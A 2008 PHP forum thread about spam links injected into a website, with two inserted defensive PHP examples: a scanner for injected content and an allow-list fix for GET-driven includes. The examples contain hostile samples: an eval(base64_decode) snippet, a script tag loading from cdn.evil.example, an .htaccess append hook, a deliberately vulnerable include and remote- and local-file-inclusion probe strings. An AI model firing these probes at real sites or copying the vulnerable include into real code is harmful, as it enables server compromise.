mrMarcus Posted November 23, 2008
https://forums.phpfreaks.com/topic/133941-php-file-spam-injection/

Hello there, anybody heard of/seen this before? I have no idea how this is happening, but I was looking over my source code today and noticed that at the top and the bottom of the source there were hundreds of links that had been injected/inserted into the source code somehow. Now, I grabbed the files off the server, and some actually had the links physically in the file, and for some it was only viewable via the web browser/view source. I scanned and searched my database; it's clean. How does this happen, and what can I do to prevent this from happening again?
Adam Posted November 23, 2008

Can't say how they will have done it without seeing anything, but you'd be best looking into PHP security: http://www.sitepoint.com/article/php-security-blunders/ - should protect from any further problems!

Adam
mrMarcus Posted November 23, 2008 (Author)

Thanks for the reply. Thing is, I wouldn't even know where to begin when trying to give you guys some examples. I can't figure out a point of entry for such an attack. Like I said, there is nothing stored in the database, and I've thoroughly scanned all directories for any suspicious files and such. I'm stumped, and very worried. Apparently these kinds of incidents can get you blacklisted from Google, etc.
waynew Posted November 23, 2008

What kind of hosting do you have?
corbin Posted November 23, 2008

If you want, you could link us to the live site and we could try to find the hole.
phil88 Posted November 24, 2008

If you're on a shared host, it could be a vulnerability in someone else's site that is messing up your site because it's on the same server.
mrMarcus Posted November 24, 2008 (Author)

^ I did just change hosting companies a few days ago to HostGator.com; seemed like a reputable gig.

> If you want, you could link us to the live site and we could try to find the hole.

My site is www.transcanadarentals.com. It's been an ongoing project of mine for years now, but just recently I've really tried to buckle down and get going on it.
awpti Posted November 24, 2008

Most likely someone broke your FTP password and just uploaded the changes. Some content can be pulled in via JavaScript (hence "only viewable via the web"). Use a stronger password and check for vulnerabilities in your PHP application (I'm guessing you didn't write it, so check the developer's site for news/info).
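An added example, not code from any poster in this thread: a small scanner for the symptom mrMarcus describes (hundreds of links at the top and bottom of every page, some present in the files on disk and some only in the served HTML) and for awpti's point that content can also be pulled in at page-load time by a script tag. The regex patterns, the anchor-count threshold, the OWN_HOSTS list and the sample web root it builds in a temp directory are all assumptions for illustration. Besides obfuscated PHP and packed link blocks in the files themselves, it checks per-directory PHP settings (.htaccess, php.ini, .user.ini) for auto_prepend_file / auto_append_file, which is one mechanism, though not the only one, that wraps every PHP response in another file and so produces markup that is visible in the browser but absent from the page files.

```php
<?php
// Added example (not from the thread): scan a web root for injected spam
// content and for server-side hooks that inject it at request time.
// Patterns, threshold, hosts and the constructed sample tree are assumptions.

const OWN_HOSTS = ['www.example.com', 'example.com']; // assumed site hosts

function scan_content(string $path, string $body): array
{
    $hits = [];
    // Many anchors packed into one line is typical of injected SEO link blocks.
    foreach (explode("\n", $body) as $n => $line) {
        $anchors = preg_match_all('/<a\s[^>]*href=/i', $line);
        if ($anchors >= 15) {
            $hits[] = sprintf('%s:%d: %d links on one line', $path, $n + 1, $anchors);
        }
    }
    // Links wrapped in a container the visitor never sees.
    if (preg_match('/display\s*:\s*none[^>]*>\s*<a\s/i', $body)) {
        $hits[] = "$path: hidden container holding links";
    }
    // Obfuscated PHP of the eval(base64_decode(...)) family.
    if (preg_match('/\b(eval|assert|preg_replace)\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(/i', $body)) {
        $hits[] = "$path: obfuscated PHP (eval/base64 family)";
    }
    // Script tags that fetch code from a host that is not ours.
    if (preg_match_all('/<script[^>]+src=["\']?(https?:)?\/\/([^\/"\'\s>]+)/i', $body, $m)) {
        foreach (array_unique($m[2]) as $host) {
            if (!in_array(strtolower($host), OWN_HOSTS, true)) {
                $hits[] = "$path: external script from $host";
            }
        }
    }
    // Per-directory PHP settings that prepend/append a file to every response
    // without touching the page files themselves.
    if (in_array(basename($path), ['.htaccess', 'php.ini', '.user.ini'], true)
        && preg_match('/auto_(prepend|append)_file\s*[= ]\s*(\S+)/i', $body, $m)) {
        $hits[] = "$path: auto_{$m[1]}_file -> {$m[2]} (wraps every PHP page)";
    }
    return $hits;
}

function scan_tree(string $root): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $f) {
        if (!$f->isFile()) {
            continue;
        }
        $path = $f->getPathname();
        if (preg_match('/\.(php|html?|inc|tpl|js|ini)$/i', $path)
            || basename($path) === '.htaccess') {
            $hits = array_merge($hits, scan_content($path, file_get_contents($path)));
        }
    }
    return $hits;
}

// Constructed sample web root so the script runs offline; not real site data.
$root = sys_get_temp_dir() . '/scan_demo_' . getmypid();
mkdir("$root/inc", 0700, true);
file_put_contents("$root/index.php", "<?php include 'inc/header.php'; ?>\n<h1>Rentals</h1>\n");
file_put_contents("$root/inc/header.php",
    "<div style=\"display:none\">" . str_repeat('<a href="http://spam.example/p">x</a>', 40) . "</div>\n");
file_put_contents("$root/.htaccess", "php_value auto_append_file /tmp/.x/footer.php\n");
file_put_contents("$root/inc/u.php", "<?php eval(base64_decode('ZWNobyAxOw=='));\n");
file_put_contents("$root/page.html", "<script src=\"//cdn.evil.example/t.js\"></script>\n");

foreach (scan_tree($root) as $h) {
    echo $h, "\n";
}

// Remove the constructed tree again.
foreach (["$root/index.php", "$root/inc/header.php", "$root/.htaccess",
          "$root/inc/u.php", "$root/page.html"] as $f) {
    unlink($f);
}
rmdir("$root/inc");
rmdir($root);
```

Run it with `php scan.php` against a copy of the web root (point `$root` at the copy instead of the constructed tree). A clean result from this script is not proof of a clean host: it only matches the patterns listed, so follow it with a comparison of the served HTML against the on-disk files and with the host's own settings (the global php.ini and any include_path the host sets are outside the web root and need the host's help to review).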
mrMarcus Posted November 24, 2008 (Author)

> Most likely someone broke your FTP password and just uploaded the changes. Some content can be pulled in via JavaScript (hence "only viewable via the web"). Use a stronger password and check for vulnerabilities in your PHP application (I'm guessing you didn't write it, so check the developer's site for news/info).

I wrote that entire site from scratch. Like I said, it's been an ongoing project for quite some time now. Thanks for the FTP tip; I'll definitely check into that. I'm just gonna have to go back over my forms. I have CAPTCHA set up on a couple of the forms, but not all; these web bots feed on unprotected forms. Thanks for the feedback (Y)
corbin Posted November 24, 2008

Hrmmm.... Do any of your pages write files? Someone could've exploited a page to write a file. When I suggested posting the link, I didn't realize it was such a large site. Usually such problems are found on smaller sites x.x
mrMarcus Posted November 24, 2008 (Author)

> Hrmmm.... Do any of your pages write files? Someone could've exploited a page to write a file. When I suggested posting the link, I didn't realize it was such a large site. Usually such problems are found on smaller sites x.x

Ya, it's a pretty large site :S and no, no page writes any file(s). No pages contain write permissions either.
PFMaBiSmAd Posted November 24, 2008

One common security hole in dynamically generated sites is to use a PHP include statement to include pages/content based on a GET parameter with no validation of the value; this allows external raw PHP code to be included from a hacker's site and executed on your server. This included code can do anything that your script can do. Doing anything like:

include $_GET['some_parameter_on_the_end_of_the_url'];
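An added example, not code from PFMaBiSmAd or from the site under discussion: the unvalidated include described above next to an allow-list version. The page names, template paths and the PAGES map are assumptions for illustration. Two facts worth knowing alongside it: since PHP 5.2.0 the `allow_url_include` setting (default Off) controls whether include() will open a URL at all, so on a current PHP the remote-code case needs that switched on; but with remote includes off, the same unvalidated include still lets a request pull in any local file the web server can read, such as an uploaded image containing PHP or a log file, which is why the allow-list is needed regardless of the php.ini setting.

```php
<?php
// Added example (not from the thread): GET-driven page include, vulnerable
// form first, then the allow-list version. Names and paths are assumptions.

// VULNERABLE: whatever arrives in ?page= goes straight to include().
// With allow_url_include=On, ?page=http://attacker.example/x.txt pulls remote
// PHP into the process; with it Off, ?page=../../../../etc/passwd or a path to
// an uploaded file still works (local file inclusion). Kept here only to show
// the shape; never call it.
function vulnerable_include(): void
{
    include $_GET['page'];
}

// HARDENED: the request value is only ever used as a key into a fixed table.
// The path that reaches include() is chosen by the code, never by the client.
const PAGES = [
    'home'    => 'templates/home.php',
    'about'   => 'templates/about.php',
    'contact' => 'templates/contact.php',
];

function resolve_page(string $requested): ?string
{
    // Reject anything that is not a short plain identifier before the lookup,
    // so a slash, null byte or URL scheme never gets near a path. The D
    // modifier makes $ match only at the very end (not before a trailing
    // newline), so "about\n" is rejected too.
    if (!preg_match('/^[a-z0-9_-]{1,32}$/D', $requested)) {
        return null;
    }
    return PAGES[$requested] ?? null;
}

function safe_include(string $requested): void
{
    $file = resolve_page($requested);
    if ($file === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include __DIR__ . '/' . $file;
}

// Demonstration with constructed request values (run from the CLI).
$probes = [
    'about',                              // legitimate
    '../../../../etc/passwd',             // local file inclusion attempt
    'http://attacker.example/shell.txt',  // remote file inclusion attempt
    "about\0.jpg",                        // null-byte truncation attempt
    "about\n",                            // trailing newline
];
foreach ($probes as $p) {
    $r = resolve_page($p);
    printf("%-40s -> %s\n", addcslashes($p, "\0\n"), $r ?? 'REJECTED');
}
```

Only the first probe resolves to a template path; the rest are rejected before any filesystem access. The same allow-list idea applies to any place a request parameter chooses a file, template, language pack or theme: map the value to a fixed table and let the code, not the client, produce the path.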